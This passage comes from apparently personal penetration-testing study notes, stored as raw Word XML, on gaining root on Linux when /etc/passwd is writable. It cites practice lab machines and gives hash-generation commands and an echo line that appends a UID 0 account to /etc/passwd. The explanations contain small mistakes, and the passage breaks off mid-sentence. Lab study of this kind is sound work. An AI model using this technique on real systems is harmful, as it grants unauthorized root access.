      <w:bookmarkEnd w:id="411"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add root user if /etc/passwd is writable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also saw this in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1017">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we ran linPEAS and saw that /etc/passwd was writable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw this in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1018">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. The XXXXXXXXX entry below also teaches us more in-depth, but here is a more TLDR Version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5-hashed password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to place it inside of /etc/passwd. There are other format that passwords can be found in /etc/passwd though. We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL, Perl, or Python</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here is all of them:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 password2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">generates an MD5-hashed password of the word "password2" using the OpenSSL toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"passwd" specifies that you want to create a hashed password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-l" specifies that you want MD5-hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"password2" is the word that your want to be MD5-hashed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to add salt, here is it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 -salt salt123 pass123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">salt123 is the password and pass123 is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E88">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -6 password@123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-6" means SHA‑512 crypt algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s the format stored in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on modern Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1019">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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -le 'print crypt("Password123","addedsalt")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E90">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import crypt; print crypt.crypt("Password123", "$6$salt")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E93">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E94">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding it to /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E95">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'cyberarri:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$1$SjqrkS08$C.gNf7z9v41honP.yqaR31</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:Arri:/home/cyberarri:/bin/bash' &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two zeros (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) mean the user ID (UID) and group ID (GID) are 0, which signifies root. So we just created a root user. There can be multiple root users on a machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also note that this is just a random hash. Make sure to make your own hash when you do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The entry "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Arri</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" here was for the Full name of the user, but it's a pretty useless entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E99">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su cyberarri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as this root user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E9F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.3.2. Abusing Password Authentication) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EA2">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is not readable by normal users. Historically however, password hashes, along with other account information, were stored in the world-readable file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For backwards compatibility, if a password hash is present in the second column of an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
